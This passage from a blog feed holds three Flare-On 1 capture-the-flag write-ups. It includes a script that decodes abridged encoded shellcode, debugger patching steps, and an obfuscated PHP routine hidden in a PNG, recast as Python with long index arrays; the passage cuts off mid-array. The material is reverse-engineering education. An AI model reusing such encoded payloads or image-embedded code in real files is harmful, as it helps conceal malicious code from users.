run and debug.</p> <p><img src="../2021-01-28-flare-on-1-challenge-4-sploitastic-images/Screen-Shot-2021-01-12-at-22.44.25.png" alt="" /></p> <pre tabindex="0"><code>from binascii import unhexlify as unhx #encoded = open(&#39;encoded.txt&#39;).read() # The shellcode dump out = open(&#39;shellcode.bin&#39;, &#39;wb&#39;) encoded =&#34;%u72f9%u4649%u1525%u7f0d%u3d3c%ue084%ud62a%ue139%ua84a%u76b9%u9824%u7378%u7d71%u757f%u2076%u96d4%uba91%u1970%ub8f9%ue232%u467b%u-SNIP-%u2454%u5740%ud0ff&#34; for s in encoded.split(&#39;%&#39;): if len(s) == 5: HI_BYTE = s[3:] LO_BYTE = s[1:3] out.write(unhx(HI_BYTE)) out.write(unhx(LO_BYTE)) out.close() </code></pre><p>I took the binary code and loaded it in <a href="https://github.com/OALabs/BlobRunner">BlobRunner</a> and attached x64dbg to it.</p> <p><img src="../2021-01-28-flare-on-1-challenge-4-sploitastic-images/711a85a33e33427082e24b7a13b3dd50.png" alt="" /><br /> The first instruction sets the carry flag to 1, the following instruction JMPs to end the code if the CF flag is set, the JB instruction needs to be patched to a NOP or the CF set to 0 to keep running the code.</p> <p><img src="../2021-01-28-flare-on-1-challenge-4-sploitastic-images/Screen-Shot-2021-01-12-at-22.32.04.png" alt="" /><br /> The code can be walked through until it loads the flag into the stack around offsec of +0x3c1 and it shows up in the register of ECX.</p> <p><img src="../2021-01-28-flare-on-1-challenge-4-sploitastic-images/Screen-Shot-2021-01-12-at-22.36.20.png" alt="" /><br /> <img src="../2021-01-28-flare-on-1-challenge-4-sploitastic-images/Screen-Shot-2021-01-12-at-22.28.37.png" alt="" /><br /> However, if you run the code until completion it shows up as junk in the message box that is displayed.</p> <p><img src="../2021-01-28-flare-on-1-challenge-4-sploitastic-images/Screen-Shot-2021-01-12-at-22.29.34.png" alt="" /><br /> To get the flag to show up in the message box you need to NOP the look starting at +0x3ce before the CALL to EAX.</p> <p><img src="../2021-01-28-flare-on-1-challenge-4-sploitastic-images/Screen-Shot-2021-01-12-at-22.35.04.png" alt="" /><br /> Now the flag shows up in the message box!</p> <p><img src="../2021-01-28-flare-on-1-challenge-4-sploitastic-images/Screen-Shot-2021-01-12-at-22.35.29.png" alt="" /></p> suidroot featured image ctf flare-on python reverse engineering wireshark Reverse Engineering https://ben.the-collective.net/posts/2021-01-26-flare-on-1-challenge-3-shellolololol/ Tue, 26 Jan 2021 09:00:00 -0500 locutus@the-collective.net (Ben Mason) Tue, 26 Jan 2021 09:00:00 -0500 https://ben.the-collective.net/posts/2021-01-26-flare-on-1-challenge-3-shellolololol/ This is a post in a series where I complete every Flare-on challenge. The landing page for all of these posts can be found here Challenge 3 brings a PE executable file to take a look at. such_evil: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows I loaded the file up in x64dbg and after navigating to the main function it looks to load a whole lot of data onto the stack then CALL into the loaded code. <p>This is a post in a series where I complete every Flare-on challenge. The landing page for all of these posts can be found <a href="https://ben.the-collective.net/project-flareon/">here</a></p> <p>Challenge 3 brings a PE executable file to take a look at.</p> <pre tabindex="0"><code>such_evil: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows </code></pre><p>I loaded the file up in x64dbg and after navigating to the main function it looks to load a whole lot of data onto the stack then CALL into the loaded code.</p> <p><img src="../2021-01-26-flare-on-1-challenge-3-shellolololol-images/Screen-Shot-2021-01-11-at-22.38.18.png" alt="" /></p> <p><img src="../2021-01-26-flare-on-1-challenge-3-shellolololol-images/Screen-Shot-2021-01-11-at-22.38.42.png" alt="" /><br /> I continued to step through the program monitoring and watching the memory region pointed to be ESI.</p> <p><img src="../2021-01-26-flare-on-1-challenge-3-shellolololol-images/Screen-Shot-2021-01-11-at-22.20.19.png" alt="" /><br /> The shell code (not pictured) is decoded and over written in multiple stages leaving these messages at ESI</p> <p><img src="../2021-01-26-flare-on-1-challenge-3-shellolololol-images/Screen-Shot-2021-01-11-at-22.28.11.png" alt="" /><br /> Finally revealing the flag</p> <p><img src="../2021-01-26-flare-on-1-challenge-3-shellolololol-images/Screen-Shot-2021-01-11-at-22.31.08.png" alt="such.5h311010101@flare-on.com" /><br /> There are more elaborate ways to reveal the flag, the <a href="https://www.fireeye.com/blog/threat-research/2014/11/the_flare_on_challen.html">official write up</a> uses IDAPython scripting to manually decode the messages.</p> suidroot featured image ctf flare-on reverse engineering Reverse Engineering https://ben.the-collective.net/posts/2021-01-21-flare-on-1-challenge-2-javascrap/ Thu, 21 Jan 2021 09:00:00 -0500 locutus@the-collective.net (Ben Mason) Thu, 21 Jan 2021 09:00:00 -0500 https://ben.the-collective.net/posts/2021-01-21-flare-on-1-challenge-2-javascrap/ This is a post in a series where I complete every Flare-on challenge. The landing page for all of these posts can be found here In Challenge 2 the zip file extracts a html and png file. From the top of the HTML file to looks pretty normal until you see the PHP tag located near the bottom of the code including the PNG file in the img directory. The file looks to be a normal PNG file and displays image data when loaded. <p>This is a post in a series where I complete every Flare-on challenge. The landing page for all of these posts can be found <a href="https://ben.the-collective.net/project-flareon/">here</a></p> <p>In Challenge 2 the zip file extracts a html and png file.</p> <p><img src="../2021-01-21-flare-on-1-challenge-2-javascrap-images/image.png" alt="" /><br /> From the top of the HTML file to looks pretty normal until you see the PHP tag located near the bottom of the code including the PNG file in the <em>img</em> directory.</p> <p><img src="../2021-01-21-flare-on-1-challenge-2-javascrap-images/image-1.png" alt="" /><br /> The file looks to be a normal PNG file and displays image data when loaded.</p> <p><img src="../2021-01-21-flare-on-1-challenge-2-javascrap-images/image-3-e1610848618587-1024x693.png" alt="" /></p> <p><img src="../2021-01-21-flare-on-1-challenge-2-javascrap-images/image-4-e1610848566699-1024x639.png" alt="" /><br /> At the end of the file, you find some PHP code. I copied out the PHP code and translated it to some python code, it looks to be a decoding routine to generate a payload.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="n">terms</span><span class="o">=</span><span class="p">[</span><span class="s2">&#34;M&#34;</span><span class="p">,</span> <span class="s2">&#34;Z&#34;</span><span class="p">,</span> <span class="s2">&#34;]&#34;</span><span class="p">,</span> <span class="s2">&#34;p&#34;</span><span class="p">,</span> <span class="s2">&#34;</span><span class="se">\\</span><span class="s2">&#34;</span><span class="p">,</span> <span class="s2">&#34;w&#34;</span><span class="p">,</span> <span class="s2">&#34;f&#34;</span><span class="p">,</span> <span class="s2">&#34;1&#34;</span><span class="p">,</span> <span class="s2">&#34;v&#34;</span><span class="p">,</span> <span class="s2">&#34;&lt;&#34;</span><span class="p">,</span> <span class="s2">&#34;a&#34;</span><span class="p">,</span> <span class="s2">&#34;Q&#34;</span><span class="p">,</span> <span class="s2">&#34;z&#34;</span><span class="p">,</span> <span class="s2">&#34; &#34;</span><span class="p">,</span> <span class="s2">&#34;s&#34;</span><span class="p">,</span> <span class="s2">&#34;m&#34;</span><span class="p">,</span> <span class="s2">&#34;+&#34;</span><span class="p">,</span> <span class="s2">&#34;E&#34;</span><span class="p">,</span> <span class="s2">&#34;D&#34;</span><span class="p">,</span> <span class="s2">&#34;g&#34;</span><span class="p">,</span> <span class="s2">&#34;W&#34;</span><span class="p">,</span> <span class="s2">&#34;</span><span class="se">\&#34;</span><span class="s2">&#34;</span><span class="p">,</span> <span class="s2">&#34;q&#34;</span><span class="p">,</span> <span class="s2">&#34;y&#34;</span><span class="p">,</span> <span class="s2">&#34;T&#34;</span><span class="p">,</span> <span class="s2">&#34;V&#34;</span><span class="p">,</span> <span class="s2">&#34;n&#34;</span><span class="p">,</span> <span class="s2">&#34;S&#34;</span><span class="p">,</span> <span class="s2">&#34;X&#34;</span><span class="p">,</span> <span class="s2">&#34;)&#34;</span><span class="p">,</span> <span class="s2">&#34;9&#34;</span><span class="p">,</span> <span class="s2">&#34;C&#34;</span><span class="p">,</span> <span class="s2">&#34;P&#34;</span><span class="p">,</span> <span class="s2">&#34;r&#34;</span><span class="p">,</span> <span class="s2">&#34;&amp;&#34;</span><span class="p">,</span> <span class="s2">&#34;</span><span class="se">\&#39;</span><span class="s2">&#34;</span><span class="p">,</span> <span class="s2">&#34;!&#34;</span><span class="p">,</span> <span class="s2">&#34;x&#34;</span><span class="p">,</span> <span class="s2">&#34;G&#34;</span><span class="p">,</span> <span class="s2">&#34;:&#34;</span><span class="p">,</span> <span class="s2">&#34;2&#34;</span><span class="p">,</span> <span class="s2">&#34;~&#34;</span><span class="p">,</span> <span class="s2">&#34;O&#34;</span><span class="p">,</span> <span class="s2">&#34;h&#34;</span><span class="p">,</span> <span class="s2">&#34;u&#34;</span><span class="p">,</span> <span class="s2">&#34;U&#34;</span><span class="p">,</span> <span class="s2">&#34;@&#34;</span><span class="p">,</span> <span class="s2">&#34;;&#34;</span><span class="p">,</span> <span class="s2">&#34;H&#34;</span><span class="p">,</span> <span class="s2">&#34;3&#34;</span><span class="p">,</span> <span class="s2">&#34;F&#34;</span><span class="p">,</span> <span class="s2">&#34;6&#34;</span><span class="p">,</span> <span class="s2">&#34;b&#34;</span><span class="p">,</span> <span class="s2">&#34;L&#34;</span><span class="p">,</span> <span class="s2">&#34;&gt;&#34;</span><span class="p">,</span> <span class="s2">&#34;^&#34;</span><span class="p">,</span> <span class="s2">&#34;,&#34;</span><span class="p">,</span> <span class="s2">&#34;.&#34;</span><span class="p">,</span> <span class="s2">&#34;l&#34;</span><span class="p">,</span> <span class="s2">&#34;$&#34;</span><span class="p">,</span> <span class="s2">&#34;d&#34;</span><span class="p">,</span> <span class="s2">&#34;`&#34;</span><span class="p">,</span> <span class="s2">&#34;%&#34;</span><span class="p">,</span> <span class="s2">&#34;N&#34;</span><span class="p">,</span> <span class="s2">&#34;*&#34;</span><span class="p">,</span> <span class="s2">&#34;[&#34;</span><span class="p">,</span> <span class="s2">&#34;0&#34;</span><span class="p">,</span> <span class="s2">&#34;}&#34;</span><span class="p">,</span> <span class="s2">&#34;J&#34;</span><span class="p">,</span> <span class="s2">&#34;-&#34;</span><span class="p">,</span> <span class="s2">&#34;5&#34;</span><span class="p">,</span> <span class="s2">&#34;_&#34;</span><span class="p">,</span> <span class="s2">&#34;A&#34;</span><span class="p">,</span> <span class="s2">&#34;=&#34;</span><span class="p">,</span> <span class="s2">&#34;{&#34;</span><span class="p">,</span> <span class="s2">&#34;k&#34;</span><span class="p">,</span> <span class="s2">&#34;o&#34;</span><span class="p">,</span> <span class="s2">&#34;7&#34;</span><span class="p">,</span> <span class="s2">&#34;#&#34;</span><span class="p">,</span> <span class="s2">&#34;i&#34;</span><span class="p">,</span> <span class="s2">&#34;I&#34;</span><span class="p">,</span> <span class="s2">&#34;Y&#34;</span><span class="p">,</span> <span class="s2">&#34;(&#34;</span><span class="p">,</span> <span class="s2">&#34;j&#34;</span><span class="p">,</span> <span class="s2">&#34;/&#34;</span><span class="p">,</span> <span class="s2">&#34;?&#34;</span><span class="p">,</span> <span class="s2">&#34;K&#34;</span><span class="p">,</span> <span class="s2">&#34;c&#34;</span><span class="p">,</span> <span class="s2">&#34;B&#34;</span><span class="p">,</span> <span class="s2">&#34;t&#34;</span><span class="p">,</span> <span class="s2">&#34;R&#34;</span><span class="p">,</span> <span class="s2">&#34;4&#34;</span><span class="p">,</span> <span class="s2">&#34;8&#34;</span><span class="p">,</span> <span class="s2">&#34;e&#34;</span><span class="p">,</span> <span class="s2">&#34;|&#34;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"><span class="n">order</span><span class="o">=</span><span class="p">[</span><span class="mi">59</span><span class="p">,</span> <span class="mi">71</span><span class="p">,</span> <span class="mi">73</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">35</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="mi">81</span><span class="p">,</span> <span class="mi">76</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">63</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="mi">76</span><span class="p">,</span> <span class="mi">68</span><span class="p">,</span> <span class="mi">50</span><span class="p">,</span> <span class="mi">30</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">63</span><span class="p">,</span> <span class="mi">45</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="mi">23</span><span class="p">,</span> <span class="mi">68</span><span class="p">,</span> <span class="mi">87</span><span class="p">,</span> <span class="mi">42</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">60</span><span class="p">,</span> <span class="mi">87</span><span class="p">,</span> <span class="mi">63</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">58</span><span class="p">,</span> <span class="mi">87</span><span class="p">,</span> <span class="mi">63</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">58</span><span class="p">,</span> <span class="mi">87</span><span class="p">,</span> <span class="mi">63</span><span class="p">,</span> <span class="mi">83</span><span class="p">,</span> <span class="mi">43</span><span class="p">,</span> <span class="mi">87</span><span class="p">,</span> <span class="mi">93</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">90</span><span class="p">,</span> <span class="mi">38</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">66</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">17</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">63</span><span class="p">,</span> <span class="mi">58</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">91</span><span class="p">,</span> <span class="mi">63</span><span class="p">,</span> <span class="mi">83</span><span class="p">,</span> <span class="mi">43</span><span class="p">,</span> <span class="mi">87</span><span class="p">,</span> <span class="mi">42</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">60</span><span class="p">,</span> <span class="mi">87</span><span class="p">,</span> <span class="mi">93</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">87</span><span class="p">,</span> <span class="mi">66</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">48</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">66</span><span class="p">,</span> <span class="mi">63</span><span class="p">,</span> <span class="mi">50</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">91</span><span class="p">,</span> <span class="mi">63</span><span class="p">,</span> <span class="mi">17</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">87</span><span class="p">,</span> <span class="mi">93</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">45</span><span class="p">,</span> <span class="mi">66</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">48</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">40</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="mi">25</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">70</span><span class="p">,</span> <span class="mi">63</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">91</span><span class="p">,</span> <span class="mi">63</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">87</span><span class="p">,</span> <span class="mi">93</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">81</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">48</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">63</span><span class="p">,</span> <span class="mi">25</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">91</span><span class="p">,</span> <span class="mi">63</span><span class="p">,</span> <span class="mi">83</span><span class="p">,</span> <span class="mi">63</span><span class="p">,</span> <span class="mi">87</span><span class="p">,</span> <span class="mi">93</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">87</span><span class="p">,</span> <span class="mi">23</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">75</span><span class="p">,</span> <span class="mi">49</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">48</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">49</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">50</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">91</span><span class="p">,</span> <span class="mi">63</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">50</span><span class="p">,</span> <span class="mi">87</span><span class="p">,</span> <span class="mi">42</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">90</span><span class="p">,</span> <span class="mi">87</span><span class="p">,</span> <span class="mi">93</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">81</span><span class="p">,</span> <span class="mi">40</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">48</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">40</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">70</span><span class="p">,</span> <span class="mi">63</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">91</span><span class="p">,</span> <span class="mi">63</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">68</span><span class="p">,</span> <span class="mi">87</span><span class="p">,</span> <span class="mi">93</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">81</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">48</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">66</span><span class="p">,</span> <span class="mi">63</span><span class="p">,</span> <span class="mi">50</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">40</span><span class="p">,</span> <span class="mi">63</span><span class="p">,</span> <span class="mi">25</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">91</span><span class="p">,</span> <span class="mi">63</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">63</span><span class="p">,</span> <span class="mi">87</span><span class="p">,</span> <span class="mi">63</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">68</span><span class="p">,</span> <span class="mi">87</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">17</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">17</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">50</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">40</span><span class="p">,</span> <span class="mi">42</span><span class="p">,</span> <span class="mi">50</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">49</span><span class="p">,</span> <span class="mi">42</span><span class="p">,</span> <span class="mi">25</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">91</span><span class="p">,</span> <span class="mi">63</span><span class="p">,</span> <span class="mi">50</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">70</span><span class="p">,</span> <span class="mi">42</span><span class="p">,</span> <span class="mi">25</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">91</span><span class="p">,</span> <span class="mi">63</span><span class="p">,</span> <span class="mi">75</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">87</span><span class="p">,</span> <span class="mi">93</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">17</span><span class="p">,</span> <span class="mi">80</span><span class="p">,</span> <span class="mi">58</span><span class="p">,</span> <span class="mi">66</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">86</span><span class="p">,</span> <span class="mi">27</span><span class="p">,</span> <span class="mi">88</span><span class="p">,</span> <span class="mi">77</span><span class="p">,</span> <span class="mi">80</span><span class="p">,</span> <span class="mi">38</span><span class="p">,</span> <span class="mi">25</span><span class="p">,</span> <span class="mi">40</span><span class="p">,</span> <span class="mi">81</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">76</span><span class="p">,</span> <span class="mi">81</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">50</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">81</span><span class="p">,</span> <span class="mi">66</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">40</span><span class="p">,</span> <span class="mi">90</span><span class="p">,</span> <span class="mi">58</span><span class="p">,</span> <span class="mi">81</span><span class="p">,</span> <span class="mi">40</span><span class="p">,</span> <span class="mi">30</span><span class="p">,</span> <span class="mi">75</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">27</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">75</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">88</span><span class="p">,</span> <span class="mi">32</span><span class="p">,</span> <span class="mi">45</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">90</span><span class="p">,</span> <span class="mi">52</span><span class="p">,</span> <span class="mi">80</span><span class="p">,</span> <span class="mi">58</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">70</span><span class="p">,</span> <span class="mi">63</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">66</span><span class="p">,</span> <span class="mi">42</span><span class="p">,</span> <span class="mi">25</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">91</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">50</span><span class="p">,</span> <span class="mi">87</span><span class="p">,</span> <span class="mi">63</span><span class="p">,</span> <span class="mi">83</span><span class="p">,</span> <span class="mi">43</span><span class="p">,</span> <span class="mi">87</span><span class="p">,</span> <span class="mi">93</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">90</span><span class="p">,</span> <span class="mi">38</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">48</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">63</span><span class="p">,</span> <span class="mi">50</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">87</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">72</span><span class="p">,</span> <span class="mi">66</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">48</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">40</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">25</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">87</span><span class="p">,</span> <span class="mi">93</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="mi">66</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">87</span><span class="p">,</span> <span class="mi">70</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">48</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">63</span><span class="p">,</span> <span class="mi">50</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">87</span><span class="p">,</span> <span class="mi">42</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">60</span><span class="p">,</span> <span class="mi">87</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">17</span><span class="p">,</span> <span class="mi">91</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">75</span><span class="p">,</span> <span class="mi">49</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">45</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">48</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">40</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">90</span><span class="p">,</span> <span class="mi">87</span><span class="p">,</span> <span class="mi">93</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">81</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">48</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">49</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">50</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">40</span><span class="p">,</span> <span class="mi">63</span><span class="p">,</span> <span class="mi">25</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">91</span><span class="p">,</span> <span class="mi">63</span><span class="p">,</span> <span class="mi">50</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">68</span><span class="p">,</span> <span class="mi">87</span><span class="p">,</span> <span class="mi">93</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">48</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">40</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">25</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">90</span><span class="p">,</span> <span class="mi">87</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">72</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">48</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">66</span><span class="p">,</span> <span class="mi">63</span><span class="p">,</span> <span class="mi">50</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">40</span><span class="p">,</span> <span class="mi">63</span><span class="p">,</span> <span class="mi">25</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">91</span><span class="p">,</span> <span class="mi">63</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">63</span><span class="p">,</span> <span class="mi">87</span><span class="p">,</span> <span class="mi">63</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">68</span><span class="p">,</span> <span class="mi">87</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">17</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">48</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">40</span><span class="p">,</span> <span class="mi">90</span><span class="p">,</span> <span class="mi">25</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">91</span><span class="p">,</span> <span class="mi">63</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">90</span><span class="p">,</span> <span class="mi">87</span><span class="p">,</span> <span class="mi">93</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">90</span><span class="p">,</span> <span 